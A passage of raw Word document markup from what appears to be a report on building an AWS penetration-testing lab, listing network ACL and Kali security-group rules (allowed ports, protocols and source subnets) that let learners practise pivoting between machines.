      <w:r w:rsidR="00A32ED7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ll </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ubnets</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1307"/>
        <w:gridCol w:w="1307"/>
        <w:gridCol w:w="1308"/>
        <w:gridCol w:w="1308"/>
        <w:gridCol w:w="1308"/>
        <w:gridCol w:w="1308"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w14:paraId="28C538D8" w14:textId="77777777" w:rsidTr="003B6979">
        <w:trPr>
          <w:trHeight w:val="584"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="745ABBD0" w14:textId="3B2E838B"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Rule Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57E40855" w14:textId="289BFBFE"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="622082C3" w14:textId="0A7D56BB"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Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14456389" w14:textId="36D12095"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Port Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45083970" w14:textId="129EF14B"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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67906024" w14:textId="501FBEC3"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Allow/Deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w14:paraId="1255F314" w14:textId="77777777" w:rsidTr="003B6979">
        <w:trPr>
          <w:trHeight w:val="285"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3122824C" w14:textId="06A780AD"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100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13ED708F" w14:textId="0150E883"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 traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1703D45A" w14:textId="7FEA9044"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308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F62F3B" w14:textId="798D7F11"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308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="677E9631" w14:textId="6DC0A570"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0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E54B2A2" w14:textId="64E6CBC1"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Allow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w14:paraId="097D52FE" w14:textId="77777777" w:rsidTr="003B6979">
        <w:trPr>
          <w:trHeight w:val="285"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="065B146B" w14:textId="630029B0"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2B11A7" w14:textId="3A9A76C5"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 traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62512A21" w14:textId="080FC702"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308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ECA1492" w14:textId="4701DBDD"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All</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0984040D" w14:textId="266A3B4D"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0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1308" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="289C267D" w14:textId="76794717" w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w:rsidRDefault="00A32ED7" w:rsidP="00D86894">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71234C96" w14:textId="77777777" w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w:rsidRDefault="00A32ED7" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5DF40E" w14:textId="35175933" w:rsidR="00A6587D" w:rsidRDefault="00B3299B" w:rsidP="00317F9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Each </w:t>
      </w:r>
      <w:r w:rsidR="00CC5E2A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">EC2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">instance operates under its own security group with distinct security rules. These configurations are </w:t>
      </w:r>
      <w:r w:rsidR="00CC5E2A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">fundamental </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>for creating a realistic penetration-testing environment, including scenarios that require pivoting from one host to another, for example, moving from machine 1 to machine 4 through machine 3</w:t>
      </w:r>
      <w:r w:rsidR="00CC5E2A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, without having a direct connection from machine 1 to machine 4.</w:t>
      </w:r>
      <w:r w:rsidR="005B655F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35571CD9" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="00317F9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C19B4FC" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="00317F9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0418D913" w14:textId="77777777" w:rsidR="006861FD" w:rsidRPr="00D77DFE" w:rsidRDefault="006861FD" w:rsidP="00317F9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755E353D" w14:textId="62651831" w:rsidR="005B655F" w:rsidRPr="00D77DFE" w:rsidRDefault="00D42CD4" w:rsidP="005B655F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kali instance machine which is set up on subnet_1 has the </w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">inbound </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="006D6EE0" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rules</w:t>
      </w:r>
      <w:r w:rsidR="00D86894" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in Table 4.12</w:t>
      </w:r>
      <w:r w:rsidR="006D6EE0" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A928E9C" w14:textId="7BE3E8D4" w:rsidR="006D6EE0" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0" w:rsidP="00705F6E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.12: Inbound </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ules in the Kali </w:t>
      </w:r>
      <w:r w:rsidR="00705F6E" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Machine</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110"/>
        <w:gridCol w:w="2108"/>
        <w:gridCol w:w="2147"/>
        <w:gridCol w:w="2128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D42CD4" w:rsidRPr="00D77DFE" w14:paraId="7A90D26B" w14:textId="77777777" w:rsidTr="00D42CD4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="594FF336" w14:textId="0381200F"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B323A2D" w14:textId="0FB6E88B"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00EECF35" w14:textId="4FE19D82"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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="648FC54C" w14:textId="507685E2"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Security group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D42CD4" w:rsidRPr="00D77DFE" w14:paraId="257E1B0B" w14:textId="77777777" w:rsidTr="00D42CD4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20E54810" w14:textId="35464BCC"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0-65535</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="170A4497" w14:textId="3136B027"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FF5FFDC" w14:textId="779E8233"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10.0.3.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B65A52B" w14:textId="0A9F4D3C"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SG_Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D42CD4" w:rsidRPr="00D77DFE" w14:paraId="21F26FDE" w14:textId="77777777" w:rsidTr="00D42CD4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71E04637" w14:textId="1025515D"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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43F2A849" w14:textId="0A869101"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TCP </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F2EDF8C" w14:textId="56E4C101"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5442CE55" w14:textId="0601D5DD"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SG_Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D42CD4" w:rsidRPr="00D77DFE" w14:paraId="3EBF1F4F" w14:textId="77777777" w:rsidTr="00D42CD4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CBA5B15" w14:textId="697440B3"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444520C0" w14:textId="171C9A0F"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ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B0643C9" w14:textId="56944239"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10.0.3.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A634E49" w14:textId="6478FF97"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SG_Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D42CD4" w:rsidRPr="00D77DFE" w14:paraId="3500D17D" w14:textId="77777777" w:rsidTr="00D42CD4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4520FCE7" w14:textId="78BF1970"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0-65535</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D9316A4" w14:textId="45C490B1"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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ED85A8F" w14:textId="2E562C3F"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10.0.2.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D16F6A4" w14:textId="17B33CEA"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SG_Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D42CD4" w:rsidRPr="00D77DFE" w14:paraId="371CDA44" w14:textId="77777777" w:rsidTr="00D42CD4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B716F10" w14:textId="5264D4AD"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49BEC407" w14:textId="26577F7E"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ICMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36732D44" w14:textId="1CB6A2D2"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10.0.2.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B9C52AE" w14:textId="1E6AC5A4" w:rsidR="00D42CD4" w:rsidRPr="00D77DFE" w:rsidRDefault="00D42CD4" w:rsidP="00D8689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SG_Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06B9AF1F" w14:textId="77777777" w:rsidR="00D42CD4" w:rsidRPr="00D77DFE" w:rsidRDefault="00D42CD4" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205AF9AC" w14:textId="294FFE07" w:rsidR="00B3299B" w:rsidRPr="00D77DFE" w:rsidRDefault="00B3299B" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">The Kali </w:t>
      </w:r>
      <w:r w:rsidR="00CC5E2A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">machine </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">is configured to reach hosts in </w:t>
      </w:r>
      <w:r w:rsidR="008F3FED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ubnet 2 and</w:t>
      </w:r>
      <w:r w:rsidR="008F3FED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Subnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3, and SSH access is enabled to allow convenient remote administration from any location.</w:t>
      </w:r>
      <w:r w:rsidR="00BC5711" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Additionally, </w:t>
      </w:r>
      <w:r w:rsidR="00A11579" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>the ICMP protocol is enabled to be able to ping</w:t>
      </w:r>
      <w:r w:rsidR="00BC5711" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the machine (for troubleshooting reasons).</w:t>
      </w:r>
      <w:r w:rsidR="007536B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> The outbound rules in Kali machine </w:t>
      </w:r>
      <w:r w:rsidR="00BC5711" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="007536B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> show</w:t>
      </w:r>
      <w:r w:rsidR="00BC5711" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="007536B4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Table 4.13 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E651C00" w14:textId="7167F6E3" w:rsidR="00095180" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.13: </w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Outbound </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ules </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00095180" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
